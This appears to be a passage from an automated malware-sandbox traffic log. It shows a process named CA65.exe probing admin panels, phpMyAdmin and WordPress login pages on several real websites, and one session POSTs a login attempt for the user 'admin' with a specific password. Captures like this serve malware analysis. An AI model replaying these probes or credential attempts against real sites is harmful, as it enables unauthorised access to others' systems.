2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 74 61 74 69 63 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 72 3d 32 30 32 30 31 31 30 35 61 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 Data Ascii: tatic.hugedomains.com/css/hdv3-css/responsive.css?r=20201105a"><script src="https://www.google.com/recaptcha/api.js" async defer></script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script> window.da
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 66 6c 61 74 2d 68 65 61 64 65 72 22 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 2d 70 61 67 65 20 67 75 69 64 65 2d 68 6f 6d 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 64 65 66 61 75 6c 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 61 69 2d 73 74 61 72 74 20 63 68 65 63 6b 6f 75 74 2d 62 6f 64 79 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 68 65 63 6b 6f 75 74 2d 63 6f 6e 74 65 6e 74 20 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 2d 70 61 67 65 2d 63 6f 6e 74 65 6e 74 22 Data Ascii: ></div></header><main class="site-main flat-header"><section class="about-page guide-home"><div class="container default"><div class="d-flex ai-start checkout-body"><div class="checkout-content full-width-container"><div class="about-page-content"
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 34 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 35 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 36 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 37 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 38 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a Data Ascii: v><div id="circularG_4" class="circularG"></div><div id="circularG_5" class="circularG"></div><div id="circularG_6" class="circularG"></div><div id="circularG_7" class="circularG"></div><div id="circularG_8" class="circularG"></div></div></button>
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 66 6f 72 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 22 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 42 75 74 74 6f 6e 20 3d 20 74 68 69 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 53 70 69 6e 6e 65 72 20 3d 20 64 Data Ascii: on () { var form = document.getElementById("captcha-form"); document.getElementById("captcha-submit-button").addEventListener("click", function () { var submitButton = this; var submitSpinner = d
2023-12-22 20:15:09 UTC	927	IN	Data Raw: 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 5f 63 70 6f 29 3b 22 3b 76 61 72 20 5f 30 78 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 5f 30 78 68 2e 68 65 69 67 68 74 20 3d 20 31 3b 5f 30 78 68 2e 77 69 64 74 68 20 3d 20 31 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 20 3d 20 27 61 62 73 6f 6c 75 74 65 27 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 74 6f 70 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 6c 65 66 74 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 Data Ascii: llenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style
2023-12-22 20:15:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
283	192.168.2.4	54188	104.17.71.73	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	394	OUT	GET /admin/ HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=4b45e58f38b6eea59fbe94c28c833ed2a2add418-1703276108; __cf_bm=9nMpgZd_MPixYtN75meezzeXJbEVPllqefCj4nL_tAA-1703276108-1-AU3jr90pv9/5sF5wI3dHxkz5wSZY2jHvoYUU/QJ8FlTPgy96ra2bHdXmA4hRnnNF5p791j4n6x0UbKTwyDBVGqk= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	278	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/admin/ Strict-Transport-Security: max-age=31536000 Server: cloudflare CF-RAY: 839b09050c2d9ae0-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
284	192.168.2.4	54736	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	455	OUT	POST /wp-login.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=eg5hoe9fiphpkgc7auqitf2hvp User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 Content-Length: 132 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:09 UTC	132	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 70 65 72 72 79 37 30 39 25 34 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=perry709%40&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:09 UTC	876	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure X-Mod-Pagespeed: 1.13.35.2-0 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BeLQ2nflo%2BypsDYqolq%2B7Jh44YNmv%2BWko5rtv80Be7lTFVcpceE3jQA4EBpHFlJ%2BR5G5FQJoICDafoCUxxJPDdCAauOhiaY28%2B%2FrnkkYSSgjivNPmFa1j3vcdXSD2VanBC9b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b09058c109ae3-MIA
2023-12-22 20:15:09 UTC	493	IN	Data Raw: 31 38 33 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 183f<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 Data Ascii: l'/><link rel='stylesheet' id='forms-css' href='https://theproducebox.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='l10n-css' href='https://theproducebox.com/wp-admin/css/l10n.min.css?ver=6.4.2' media='all'/><link re
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 77 64 22 20 69 64 3d 22 75 73 65 72 5f 70 61 73 73 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 70 61 73 73 77 6f Data Ascii: omplete="username" required="required"/></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd"><input type="password" name="pwd" id="user_pass" aria-describedby="login_error" class="input passwo
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 73 73 22 29 3b 64 2e 76 61 6c 75 65 3d 22 22 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f 61 64 28 29 7d 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 3c 2f 61 3e 09 09 3c 2f 70 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 73 63 72 69 Data Ascii: ss");d.value="";d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnload()}//...</script><p id="backtoblog"><a href="https://theproducebox.com/">← Go to The Produce Box</a></p></div><scri
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 Data Ascii: dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script type="text/javascript" src
2023-12-22 20:15:09 UTC	246	IN	Data Raw: 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 09 3c 2f 68 74 6d 6c 3e 0a 09 0d 0a Data Ascii: ra">//<![CDATA[var userProfileL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></body></html>
2023-12-22 20:15:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
285	192.168.2.4	54194	34.136.28.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	170	OUT	GET /admin HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	828	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPoH5K_qyJf-K6M11F3O7axeDOk2fGwLP_prIC5SSdxRLdMg-0jn-0Z1LPVVGaeaxkUdv-I date: Fri, 22 Dec 2023 20:15:09 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:15:09 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:15:09 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
286	192.168.2.4	54448	34.149.87.45	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	179	OUT	GET /admin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	652	IN	HTTP/1.1 404 Not Found Content-Length: 2929 Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276107.453170988273848858 Cache-Control: public,max-age=0,must-revalidate Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:15:09 GMT Age: 7 X-Served-By: cache-dfw-kdfw8210074-DFW X-Cache: HIT Vary: Accept-Encoding Server-Timing: cache;desc=hit, varnish;desc=hit_hit, dc;desc=fastly_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:15:09 UTC	600	IN	Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
2023-12-22 20:15:09 UTC	1252	IN	Data Raw: 2f 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 74 79 6c 65 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6c 61 6e 67 3d 22 65 6e 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 45 72 72 6f 72 50 61 67 65 43 6f 6e 74 72 6f 6c 6c 65 72 20 61 73 20 65 72 72 6f 72 50 61 67 65 43 74 72 6c 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 70 61 67 65 2d 61 70 70 22 20 6e 67 2d 63 6c 61 73 73 3d 22 7b 27 Data Ascii: /> ... --> <link rel="stylesheet" href="//static.parastorage.com/services/wix-public/1.719.0/styles/error-pages/styles.css"> ... --></head><body lang="en" ng-controller="ErrorPageController as errorPageCtrl" class="error-page-app" ng-class="{'
2023-12-22 20:15:09 UTC	1077	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 62 61 73 65 44 6f 6d 61 69 6e 27 2c 20 27 77 69 78 2e 63 6f 6d 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 6c 61 6e 67 75 61 67 65 Data Ascii: <script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.719.0/'); angular.module('wixErrorPagesApp').constant('baseDomain', 'wix.com'); angular.module('wixErrorPagesApp').constant('language

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
287	192.168.2.4	54126	64.68.191.221	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	178	OUT	GET //PhpMyAdmin/ HTTP/1.1 Host: adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	364	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.adelaideclub.com/PhpMyAdmin/ X-Redirect-Reason: Wrong Portal Alias Requested Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:15:09 GMT Connection: close Content-Length: 157
